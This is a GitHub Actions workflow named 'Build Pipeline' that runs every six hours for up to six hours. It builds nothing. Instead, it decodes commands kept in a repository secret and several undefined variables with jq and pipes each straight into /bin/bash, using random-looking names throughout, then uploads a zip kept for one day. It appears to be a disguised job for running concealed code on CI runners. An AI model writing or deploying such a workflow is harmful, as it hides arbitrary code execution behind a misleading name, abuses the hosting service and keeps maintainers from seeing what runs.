name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '15 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          lnk549: ${{ secrets.lnk549 }}
        run: |
          printf '%s' "$lnk549" | jq -r .hn28993 | /bin/bash
          printf '%s' "$bvo962" | jq -r .gdeap541 | /bin/bash
          printf '%s' "$rodt6" | jq -r .g72270 | /bin/bash
          printf '%s' "$kvnqs379" | jq -r .qtrdr65322 | /bin/bash
          echo $fkbae09421 | jq -r .dq7 | /bin/bash
          printf '%s' "$bpyev2" | jq -r .sj291 | /bin/bash

      - name: Store artifact
        uses: actions/upload-artifact@v4
        with:
          name: Lu8v9gQr
          path: "*.zip"
          retention-days: 1
